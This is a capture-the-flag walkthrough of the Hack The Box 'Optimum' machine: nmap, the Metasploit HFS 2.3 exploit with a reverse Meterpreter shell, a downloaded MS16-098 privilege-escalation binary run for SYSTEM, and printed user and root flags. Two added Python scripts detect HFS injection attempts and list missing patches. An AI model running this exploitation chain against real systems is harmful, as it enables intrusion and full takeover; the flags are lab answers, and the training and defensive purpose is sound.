Hack The Box – Optimum – Walkthrough

This time I opened two ports:

docker run -p 1234:1234 -p 8080:8080 -t -i htb /bin/bash

The nmap scan shows that HFS (HttpFileServer 2.3) is running on port 80:

# nmap -A -n -F -T5 optimum.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 14:29 UTC
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.042s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer
Running: HP embedded
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000
OS details: HP 170X print server or Inkjet 3000 printer, HP LaserJet 4250 printer
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploit the HFS vulnerability with msfconsole:

# msfconsole

               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.100-dev                         ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u <session_id>

msf5 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index, for example use 1 or use exploit/windows/http/rejetto_hfs_exec

msf5 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS optimum.htb
RHOSTS => optimum.htb
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.6
LHOST => 10.10.14.14
msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 1234
LPORT => 1234
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit

[-] Handler failed to bind to 10.10.14.14:1234:-  -
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Using URL: http://0.0.0.0:8080/JaNzZ3CB
[*] Local IP: http://172.17.0.2:8080/JaNzZ3CB
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /JaNzZ3CB
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:46836) at 2020-08-05 16:23:53 +0000
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\ZOcsozkNyOEfb.vbs' on the target

meterpreter >
[!] Tried to delete %TEMP%\ZOcsozkNyOEfb.vbs, unknown result
getuid
Server username: OPTIMUM\kostas

meterpreter > shell
Process 1324 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
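As an added defender-side example (not part of the original walkthrough and not Metasploit code), the script below scans web-server access-log lines for the two indicators of the HFS 2.3 weakness that rejetto_hfs_exec targets: a percent-encoded null byte and an HFS "{.macro.}" marker in the query string. The page itself does not show the request, so the indicator choice is an assumption taken from the public description of that bug; the log lines, client IPs and the macro name are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# HFS macro marker: "{." ... ".}" (the template syntax the server-side parser expands)
MACRO_RE = re.compile(r"\{\.[^{}]*\.\}")
# Minimal access-log parser: client IP and the request target of the request line
REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Constructed log lines for this example (Combined-Log style). Lines 3 and 4 carry
# a percent-encoded null byte and/or an encoded macro marker in the search parameter;
# the macro name is a placeholder, not a real HFS macro.
LOG_LINES = [
    '10.0.0.5 - - [05/Aug/2020:16:23:50 +0000] "GET / HTTP/1.1" 200 1024',
    '10.0.0.5 - - [05/Aug/2020:16:23:51 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Aug/2020:16:23:52 +0000] "GET /?search=%00{.CONSTRUCTED|arg.} HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Aug/2020:16:23:53 +0000] "GET /?search=%7B.CONSTRUCTED.%7D HTTP/1.1" 200 512',
]


def hfs_injection_indicators(request_target):
    """Return the indicator names found in one request target (path?query)."""
    # Decode once so %00 becomes "\x00" and %7B / %7D become "{" / "}".
    decoded = unquote(urlsplit(request_target).query)
    found = []
    if "\x00" in decoded:
        found.append("null-byte")
    if MACRO_RE.search(decoded):
        found.append("macro-marker")
    return found


def flag_hfs_requests(log_lines):
    """Scan access-log lines and return the requests that carry an indicator."""
    hits = []
    for line in log_lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        indicators = hfs_injection_indicators(m["target"])
        if indicators:
            hits.append({"ip": m["ip"], "target": m["target"], "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in flag_hfs_requests(LOG_LINES):
        print(f"{hit['ip']} {hit['target']} -> {', '.join(hit['indicators'])}")
```

The detector decodes the query string exactly once, so a WAF placement that sees double-encoded input would need a second pass; and it only tells you who tried. The fix for the finding nmap reported above is to patch or retire the HFS 2.3 instance, not to rely on the log check.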

Use Windows-Exploit-Suggester to look for missing patches (privilege-escalation candidates):

meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"
Process 3604 created.
meterpreter > download systeminfo.txt
[*] Downloading: systeminfo.txt -> systeminfo.txt
[*] Downloaded 3.26 KiB of 3.26 KiB (100.0%): systeminfo.txt -> systeminfo.txt
[*] download   : systeminfo.txt -> systeminfo.txt
meterpreter > bg
[*] Backgrounding session 1..

msf5 exploit(windows/http/rejetto_hfs_exec) > git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
[*] exec: git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Cloning into 'Windows-Exploit-Suggester'...
remote: Enumerating objects: 120, done.
remote: Total 120 (delta 0), reused 0 (delta 0), pack-reused 120
Receiving objects: 100% (120/120), 169.26 KiB | 365.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.
msf5 exploit(windows/http/rejetto_hfs_exec) > cd Windows-Exploit-Suggester/
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --update
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library

msf5 exploit(windows/http/rejetto_hfs_exec) > apt install python-pip
msf5 exploit(windows/http/rejetto_hfs_exec) > python -m pip install xlrd --upgrade
...
Installing collected packages: xlrd
Successfully installed xlrd-1.2.0

msf5 exploit(windows/http/rejetto_hfs_exec) > vi systeminfo.txt
(Note: some of the characters were garbled and could not be processed, so I deleted the garbled portions.)
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done
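The core of the check the suggester performs, as an added Python 3 example (not the Windows-Exploit-Suggester code and not from the original post): decode the captured systeminfo output without failing on garbled bytes, pull the KB list, and diff it against a bulletin-to-KB table. The table holds only a handful of bulletins copied from the suggester output above and is a constructed subset (a real run loads the full MSSB spreadsheet fetched by --update); the sample systeminfo bytes are constructed too, with a deliberately non-UTF-8 field to mimic the garbling that had to be hand-edited away above.

```python
import re

# Bulletin -> KB article number, copied from the suggester output for the few
# bulletins used here (constructed subset; a real check loads the full MSSB database).
BULLETIN_KB = {
    "MS16-135": "3199135",
    "MS16-098": "3178466",
    "MS16-075": "3164038",
    "MS16-032": "3143141",
    "MS16-016": "3136041",
}

KB_RE = re.compile(r"KB(\d{6,7})")
OS_RE = re.compile(r"^OS Name:\s*(.+)$", re.MULTILINE)

# Constructed systeminfo capture (bytes, as downloaded): host and OS values follow
# the page, the locale field holds non-UTF-8 bytes on purpose, three hotfixes listed.
SAMPLE_SYSTEMINFO = (
    b"Host Name:                 OPTIMUM\r\n"
    b"OS Name:                   Microsoft Windows Server 2012 R2 Standard\r\n"
    b"OS Version:                6.3.9600 N/A Build 9600\r\n"
    b"System Locale:             \xa5\xc1\xd7\xd5 (constructed garbled field)\r\n"
    b"Hotfix(s):                 3 Hotfix(s) Installed.\r\n"
    b"                           [01]: KB3143141\r\n"
    b"                           [02]: KB3136041\r\n"
    b"                           [03]: KB2919355\r\n"
)


def decode_systeminfo(raw):
    """Decode redirected systeminfo output without failing on garbled bytes."""
    if raw.startswith(b"\xff\xfe"):          # UTF-16 LE BOM (e.g. a `cmd /u` redirect)
        return raw.decode("utf-16")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        # Console code-page output: keep the ASCII tokens (KB numbers, OS name) and
        # replace undecodable bytes instead of aborting or hand-editing the file.
        return raw.decode("utf-8", errors="replace")


def installed_kbs(text):
    """Set of KB numbers (digits only) listed under Hotfix(s)."""
    return set(KB_RE.findall(text))


def missing_bulletins(text, table=BULLETIN_KB):
    """Bulletins whose KB is absent from the hotfix list, sorted for stable output."""
    present = installed_kbs(text)
    return sorted(b for b, kb in table.items() if kb not in present)


def patch_gap_report(raw):
    """Decode, then summarise OS name, hotfix count and missing bulletins."""
    text = decode_systeminfo(raw)
    m = OS_RE.search(text)
    return {
        "os_name": m.group(1).strip() if m else "unknown",
        "installed_count": len(installed_kbs(text)),
        "missing": missing_bulletins(text),
    }


if __name__ == "__main__":
    report = patch_gap_report(SAMPLE_SYSTEMINFO)
    print(report["os_name"], "-", report["installed_count"], "hotfixes")
    for bulletin in report["missing"]:
        print("missing:", bulletin, "KB" + BULLETIN_KB[bulletin])
```

A missing KB is only a candidate: superseding cumulative updates can cover a bulletin without its original KB appearing in the list, which is why the suggester's own output above still lists 246 "remaining vulns" for a host that has 32 hotfixes. Treat the result as a prioritised patch queue rather than as proof of exposure.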

Using MS16-098 as the starting point, escalate to administrator privileges:

Search for "MS16-098 exploit" to find the exploit.

msf5 exploit(windows/http/rejetto_hfs_exec) > wget -d https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x86/windows  OPTIMUM\kostas @ OPTIMUM  172.17.0.2:1234 -> 172.17.0.1:48926 (10.10.10.8)

msf5 exploit(windows/http/rejetto_hfs_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload 41020.exe
[*] uploading  : 41020.exe -> 41020.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe
[*] uploaded   : 41020.exe -> 41020.exe

meterpreter > shell
Process 1100 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

C:\Users\kostas\Desktop>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
51ed1b36553c8461f4552c2e92b3eeed